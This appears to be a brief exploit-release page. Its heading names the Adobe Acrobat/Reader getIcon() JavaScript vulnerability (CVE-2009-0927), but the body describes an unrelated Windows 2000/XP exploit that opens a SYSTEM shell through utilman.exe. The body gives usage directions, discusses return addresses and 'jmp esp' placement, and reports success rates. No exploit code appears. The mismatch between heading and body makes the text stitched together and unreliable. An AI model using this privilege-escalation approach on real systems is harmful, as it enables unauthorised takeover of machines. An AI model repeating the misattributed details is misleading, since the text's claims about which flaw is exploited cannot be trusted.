Exploit and technical report about the Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927).
Back again with a cutie exploit, it avoids losing time with password sniffing/cracking :).The exploit executes a shell through utilman.exe with SYSTEM priviliges. Use it from a graphic interface (rdp/vnc/radmin/etc) or directly with physical access.
So, the most interesting thing is how to make it become universal, writing 'jmp esp's in memory.. I don't think it will work on many circumstances, like what the server is doing, how many people is logged on, the connections limit, etc.. But I think we can find a nice ret value, based on how many connections were successfull, or doing something to always have our FFE4 (jmp esp) at a fixed place in memory.
8 of 10 win2k hosts tested successfully exploited. It works for winXP too but with 3 variants, the 0 and 1 are the most commun, 2 was reported only by one winXP sp0.No variants for win2k 'cause the ret addr found works at 80% :P